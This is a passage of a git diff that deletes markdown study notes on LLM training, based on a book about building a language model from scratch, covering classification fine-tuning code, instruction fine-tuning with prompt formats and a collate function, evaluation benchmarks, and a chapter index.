-        num_batches = min(num_batches, len(data_loader))
-    for i, (input_batch, target_batch) in enumerate(data_loader):
-        if i < num_batches:
-            input_batch, target_batch = input_batch.to(device), target_batch.to(device)
-
-            with torch.no_grad():
-                logits = model(input_batch)[:, -1, :]  # Logits of last output token
-            predicted_labels = torch.argmax(logits, dim=-1)
-
-            num_examples += predicted_labels.shape[0]
-            correct_predictions += (predicted_labels == target_batch).sum().item()
-        else:
-            break
-    return correct_predictions / num_examples
-
-
-def calc_loss_batch(input_batch, target_batch, model, device):
-    input_batch, target_batch = input_batch.to(device), target_batch.to(device)
-    logits = model(input_batch)[:, -1, :]  # Logits of last output token
-    loss = torch.nn.functional.cross_entropy(logits, target_batch)
-    return loss
-```
-
-Note how for each batch we are only interested in the **logits of the last token predicted**.
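-
-As an illustration of how such a fine-tuned classifier could be used at inference time, here is a hedged sketch (the helper name, the padding handling and the label mapping are assumptions that mirror the logic above, not code from the book):
-
-```python
-def classify_text(text, model, tokenizer, device, max_length, pad_token_id=50256):
-    model.eval()
-
-    input_ids = tokenizer.encode(text)[:max_length]                      # truncate if too long
-    input_ids += [pad_token_id] * (max_length - len(input_ids))          # pad to the expected length
-    input_tensor = torch.tensor(input_ids, device=device).unsqueeze(0)   # add batch dimension
-
-    with torch.no_grad():
-        logits = model(input_tensor)[:, -1, :]   # only the logits of the last token matter
-    predicted_label = torch.argmax(logits, dim=-1).item()
-
-    return "spam" if predicted_label == 1 else "not spam"
-```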
-
-## Complete GPT2 fine-tune classification code
-
-You can find all the code to fine-tune GPT2 to be a spam classifier in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/load-finetuned-model.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/load-finetuned-model.ipynb)
-
-## References
-
-- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
-
diff --git a/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md b/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md
deleted file mode 100644
index acb2d000e..000000000
--- a/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md
+++ /dev/null
@@ -1,100 +0,0 @@
-# 7.2. Fine-Tuning to Follow Instructions
-
-> [!TIP]
-> The goal of this section is to show how to **fine-tune an already pre-trained model to follow instructions** rather than just generating text, for example, responding to tasks as a chat bot.
-
-## Dataset
-
-In order to fine-tune an LLM to follow instructions, a dataset with instructions and responses is needed. There are different formats to train an LLM to follow instructions, for example:
-
-- The Alpaca prompt style example:
-```csharp
-Below is an instruction that describes a task. Write a response that appropriately completes the request.
-
-### Instruction:
-Calculate the area of a circle with a radius of 5 units.
-
-### Response:
-The area of a circle is calculated using the formula \( A = \pi r^2 \). Plugging in the radius of 5 units:
-
-\( A = \pi (5)^2 = \pi \times 25 = 25\pi \) square units.
-```
-- The Phi-3 prompt style example:
-```vbnet
-<|User|>
-Can you explain what gravity is in simple terms?
-
-<|Assistant|>
-Absolutely! Gravity is a force that pulls objects toward each other.
-```
-Training an LLM with these kinds of data sets instead of just raw text helps the LLM understand that it needs to give specific responses to the questions it receives.
-
-Therefore, one of the first things to do with a dataset that contains requests and responses is to model that data in the desired prompt format, like:
-```python
-# Code from https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/ch07.ipynb
-def format_input(entry):
-    instruction_text = (
-        f"Below is an instruction that describes a task. "
-        f"Write a response that appropriately completes the request."
-        f"\n\n### Instruction:\n{entry['instruction']}"
-    )
-
-    input_text = f"\n\n### Input:\n{entry['input']}" if entry["input"] else ""
-
-    return instruction_text + input_text
-
-model_input = format_input(data[50])
-
-desired_response = f"\n\n### Response:\n{data[50]['output']}"
-
-print(model_input + desired_response)
-```
-Then, as always, it's needed to separate the dataset into sets for training, validation and testing.
-
-## Batching & Data Loaders
-
-Then, it's needed to batch all the inputs and expected outputs for the training. For this, it's needed to:
-
-- Tokenize the texts
-- Pad all the samples to the same length (usually the length will be as big as the context length used to pre-train the LLM)
-- Create the expected tokens by shifting the input by 1 in a custom collate function (a sketch is shown after this list)
-- Replace some padding tokens with -100 to exclude them from the training loss: after the first `endoftext` token, substitute all the other `endoftext` tokens with -100 (because using `cross_entropy(...,ignore_index=-100)` makes it ignore targets with the value -100)
-- \[Optional\] Mask using -100 also all the tokens belonging to the question so the LLM learns only how to generate the answer. In the Alpaca style this means masking everything up to `### Response:`
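-
-A hedged sketch of such a custom collate function (simplified; the function name, the default pad token id and the `ignore_index` value follow the description in the list above, and the batch is assumed to be a list of token-id lists):
-
-```python
-import torch
-
-def custom_collate_fn(batch, pad_token_id=50256, ignore_index=-100, device="cpu"):
-    # Longest sequence in the batch (+1 so an extra pad token can act as the last target)
-    batch_max_length = max(len(item) + 1 for item in batch)
-
-    inputs_lst, targets_lst = [], []
-    for item in batch:
-        padded = item + [pad_token_id] * (batch_max_length - len(item))
-        inputs = torch.tensor(padded[:-1])   # inputs: all tokens except the last
-        targets = torch.tensor(padded[1:])   # targets: inputs shifted by one position
-
-        # Keep the first end-of-text target and mask every additional padding token
-        mask = targets == pad_token_id
-        indices = torch.nonzero(mask).squeeze()
-        if indices.numel() > 1:
-            targets[indices[1:]] = ignore_index
-
-        inputs_lst.append(inputs)
-        targets_lst.append(targets)
-
-    return torch.stack(inputs_lst).to(device), torch.stack(targets_lst).to(device)
-```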
-
-Having created this, it's time to create the data loaders for each dataset (training, validation and testing).
-
-## Load the pre-trained LLM & Fine tune & Loss Checking
-
-It's needed to load a pre-trained LLM to fine-tune it. This was already discussed in other pages. Then, it's possible to use the previously used training function to fine-tune the LLM.
-
-During the training it's also possible to see how the training loss and validation loss vary during the epochs to check if the loss is getting reduced and if overfitting is occurring.\
-Remember that overfitting occurs when the training loss is getting reduced but the validation loss is not being reduced or is even increasing. To avoid it, the simplest thing to do is to stop the training at the epoch where this behaviour starts.
-
-## Response Quality
-
-As this is not a classification fine-tuning where it's possible to trust the loss variations more, it's also important to check the quality of the responses on the testing set. Therefore, it's recommended to gather the generated responses from all the testing sets and **check their quality manually** in order to see if there are wrong answers (note that it's possible for the LLM to create responses that correctly follow the format and syntax of the response sentence but give a completely wrong response; the loss variation won't reflect this behaviour).\
-Note that it's also possible to perform this review by passing the generated responses and the expected responses to **other LLMs and asking them to evaluate the responses**.
-
-Other tests to run to verify the quality of the responses:
-
-1. **Measuring Massive Multitask Language Understanding (**[**MMLU**](https://arxiv.org/abs/2009.03300)**):** MMLU evaluates a model's knowledge and problem-solving abilities across 57 subjects, including humanities, sciences, and more. It uses multiple-choice questions to assess understanding at various difficulty levels.
-2. [**LMSYS Chatbot Arena**](https://arena.lmsys.org): This platform allows users to compare responses from different chatbots side by side. Users input a prompt, and multiple chatbots generate responses that can be compared directly.
-3. [**AlpacaEval**](https://github.com/tatsu-lab/alpaca_eval)**:** AlpacaEval is an automated evaluation framework where an advanced LLM like GPT-4 evaluates the responses of other models to various prompts.
-4. **General Language Understanding Evaluation (**[**GLUE**](https://gluebenchmark.com/)**):** GLUE is a collection of nine natural language understanding tasks, including sentiment analysis, textual entailment and question answering.
-5. [**SuperGLUE**](https://super.gluebenchmark.com/)**:** Building upon GLUE, SuperGLUE includes tasks that are challenging for current models.
-6. **Beyond the Imitation Game Benchmark (**[**BIG-bench**](https://github.com/google/BIG-bench)**):** BIG-bench is a large-scale benchmark with more than 200 tasks that test a model's abilities in areas like reasoning, translation and question answering.
-7. **Holistic Evaluation of Language Models (**[**HELM**](https://crfm.stanford.edu/helm/lite/latest/)**):** HELM provides a comprehensive evaluation across various metrics such as accuracy, robustness and fairness.
-8. [**OpenAI Evals**](https://github.com/openai/evals)**:** An open-source evaluation framework by OpenAI that allows testing AI models on custom and standardized tasks.
-9. [**HumanEval**](https://github.com/openai/human-eval)**:** A collection of programming problems used to evaluate the code generation abilities of language models.
-10. **Stanford Question Answering Dataset (**[**SQuAD**](https://rajpurkar.github.io/SQuAD-explorer/)**):** SQuAD consists of questions about Wikipedia articles, where models must comprehend the text to answer accurately.
-11. [**TriviaQA**](https://nlp.cs.washington.edu/triviaqa/)**:** A large-scale dataset of trivia questions and answers, along with evidence documents.
-
-And many, many more.
-
-## Fine-tune to follow instructions code
-
-An example of the code to perform this fine-tuning can be found in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py)
-
-## References
-
-- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
diff --git a/src/todo/llm-training-data-preparation/README.md b/src/todo/llm-training-data-preparation/README.md
deleted file mode 100644
index b1146ab2d..000000000
--- a/src/todo/llm-training-data-preparation/README.md
+++ /dev/null
@@ -1,98 +0,0 @@
-# LLM Training - Data Preparation
-
-**These are my notes from the highly recommended book** [**https://www.manning.com/books/build-a-large-language-model-from-scratch**](https://www.manning.com/books/build-a-large-language-model-from-scratch) **with some extra information.**
-
-## Basic Information
-
-You should start by reading this post for some basic concepts you should know about:
-
-{{#ref}}
-0.-basic-llm-concepts.md
-{{#endref}}
-
-## 1. Tokenization
-
-> [!TIP]
-> The goal of this initial phase is very simple: **Divide the input into tokens (ids) in some way that makes sense.**
-
-{{#ref}}
-1.-tokenizing.md
-{{#endref}}
-
-## 2. Data Sampling
-
-> [!TIP]
-> The goal of this second phase is very simple: **Sample the input data and prepare it for the training phase, usually by separating the dataset into sentences of a specific length and also generating the expected response.**
-
-{{#ref}}
-2.-data-sampling.md
-{{#endref}}
-
-## 3. Token Embeddings
-
-> [!TIP]
-> The goal of this third phase is very simple: **Assign each of the previous tokens in the vocabulary a vector of the desired dimensions to train the model.** Each word in the vocabulary will be a point in a space of X dimensions.\
-> Note that initially the position of each word in the space is just initialised "randomly", and these positions are trainable parameters (they will be improved during the training).
->
-> Moreover, during the token embedding **another layer of embeddings is created** which represents (in this case) the **absolute position of the word in the training sentence**. This way a word in different positions in the sentence will have a different representation (meaning).
-
-{{#ref}}
-3.-token-embeddings.md
-{{#endref}}
-
-## 4. Attention Mechanisms
-
-> [!TIP]
-> The goal of this fourth phase is very simple: **Apply some attention mechanisms**. These are going to be a lot of **repeated layers** that are going to **capture the relation of a word in the vocabulary with its neighbours in the current sentence being used to train the LLM**.\
-> A lot of layers are used for this, so a lot of trainable parameters are going to be capturing this information.
-
-{{#ref}}
-4.-attention-mechanisms.md
-{{#endref}}
-
-## 5. LLM Architecture
-
-> [!TIP]
-> The goal of this fifth phase is very simple: **Develop the architecture of the whole LLM**. Put everything together, apply all the layers and create all the functions to generate text or transform text to IDs and back.
->
-> This architecture will be used for both training and predicting text after it was trained.
-
-{{#ref}}
-5.-llm-architecture.md
-{{#endref}}
-
-## 6. Pre-training & Loading models
-
-> [!TIP]
-> The goal of this sixth phase is very simple: **Train the model from scratch**. For this, the previous LLM architecture will be used with some loops going over the data sets, using the defined loss functions and optimizer to train all the parameters of the model.
-
-{{#ref}}
-6.-pre-training-and-loading-models.md
-{{#endref}}
-
-## 7.0. LoRA Improvements in fine-tuning
-
-> [!TIP]
-> The use of **LoRA reduces a lot the computation** needed to **fine tune** already trained models.
-
-{{#ref}}
-7.0.-lora-improvements-in-fine-tuning.md
-{{#endref}}
-
-## 7.1. Fine-Tuning for Classification
-
-> [!TIP]
-> The goal of this section is to show how to fine-tune an already pre-trained model so that, instead of generating new text, the LLM gives the **probabilities of the given text being categorized in each of the given categories** (like whether a text is spam or not).
-
-{{#ref}}
-7.1.-fine-tuning-for-classification.md
-{{#endref}}
-
-## 7.2. Fine-Tuning to follow instructions
-
-> [!TIP]
-> The goal of this section is to show how to **fine-tune an already pre-trained model to follow instructions** rather than just generating text, for example, responding to tasks as a chat bot.
-
-{{#ref}}
-7.2.-fine-tuning-to-follow-instructions.md
-{{#endref}}